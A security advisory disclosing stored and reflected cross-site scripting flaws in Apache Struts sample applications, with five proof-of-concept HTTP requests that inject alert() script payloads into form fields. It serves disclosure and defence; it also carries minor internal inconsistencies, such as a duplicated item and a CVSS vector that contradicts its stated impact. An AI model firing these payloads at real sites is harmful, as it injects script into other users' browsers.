##############################################################################
#
# Title : Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
# Author : Antu Sanadi SecPod Technologies (www.secpod.com)
# Vendor : http://struts.apache.org/
# Advisory : http://secpod.org/blog/?p=450
# http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt
# Software : Apache struts 1.3.10, 2.0.14 and 2.2.3
# Date : 01/02/2012
#
##############################################################################
SecPod ID: 1021 21/07/2011 Issue Discovered
03/08/2011 Vendor Notified
No Response
01/02/2012 Advisory Released
Class: Cross-Site Scripting (Persistence) Severity: High
Overview:
---------
Apache Struts Multiple Persistence Cross-Site Scripting Vulnerabilities.
Technical Description:
----------------------
Multiple persistence Cross-Site Scripting vulnerabilities are present in
Apache Struts, as it fails to sanitise user-supplied input.
i) Input passed via the 'name' and 'lastName' parameter in
'/struts2-showcase/person/editPerson.action' is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
ii) Input passed via the 'clientName' parameter in
'/struts2-rest-showcase/orders' action is not properly verified before
it is returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in the context of a
vulnerable site.
iii) Input passed via the 'name' parameter in
'/struts-examples/upload/upload-submit.do?queryParam=Successful' action
is not properly verified before it is returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in the context of a vulnerable site.
iV) Input passed via the 'message' parameter in
'/struts-cookbook/processSimple.do' action is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
V) Input passed via the 'message' parameter in
'/struts-cookbook/processSimple.do' action is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
These vulnerabilities have been tested on Apache Struts2 v2.2.3,
Apache Struts2 v2.0.14 and Apache Struts v1.3.10.
Other versions may also be affected.
Impact:
--------
Successful exploitation could allow an attacker to execute arbitrary HTML
code in a user's browser session in the context of a vulnerable application.
Affected Software:
------------------
Apache struts 2.2.3 and prior.
Tested on,
i) Apache struts 2.2.3 - Stored XSS
- struts2-showcase-2.2.3
- struts2-rest-showcase-2.2.3
ii) Apache struts 2.0.14 - Stored XSS
- struts2-showcase-2.0.14
iii) Apache struts 1.3.10 - Reflected XSS
- struts-cookbook-1.3.10
- struts-examples-1.3.10
References:
-----------
http://struts.apache.org
http://secpod.org/blog/?p=450
Proof of Concept:
-----------------
POC 1:
-----
Stored XSS
POST struts2-showcase/person/editPerson.action HTTP/1.1
Host: SERVER_IP:8080
User-Agent: struts2-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Post Data:
----------
persons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript
%3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2
Fscript%3E&method%3Asave=Save+all+persons
POC 2:
-----
Stored XSS
POST /struts2-rest-showcase/orders HTTP/1.1
Host: SERVER_IP:8080
User-Agent: struts2-rest-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Post Data:
----------
clientName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&amount=
POC 3:
-----
Reflected XSS
POST /struts-examples/upload/upload-submit.do?queryParam=Successful HTTP/1.1
Host: SERVER_IP:8080
User-Agent: Struts-examples XSS-TEST
Content-Type: multipart/form-data; boundary=---------------------------41701
161044225432961947041
Content-Length: 481
Post Data:
----------
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="theText"\r\n
\r\n
<script>alert("SecPod-XSS-TEST")</script>\r\n
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="theFile"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="filePath"\r\n
\r\n
\r\n
-----------------------------41701161044225432961947041--\r\n
POC 4:
-----
Reflected XSS
POST /struts-cookbook/processSimple.do HTTP/1.1
Host: SERVER_IP:8080
User-Agent:Struts-cookbook XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Post Data:
----------
name=XYZ&secret=XYZ&color=red&confirm=on&rating=1&message=%3Cscript%3Ealert
%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&
POC 5:
-----
Reflected XSS
POST /struts-cookbook/processDyna.do HTTP/1.1
Host: SERVER_IP:8080
User-Agent:Struts-cookbook XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Post Data:
----------
name=ZYZ&secret=&color=red&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST
%22%29%3C%2Fscript%3E&
Solution:
---------
Fix not available
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = PARTIAL
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 6.4 (High) (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
vulnerability.
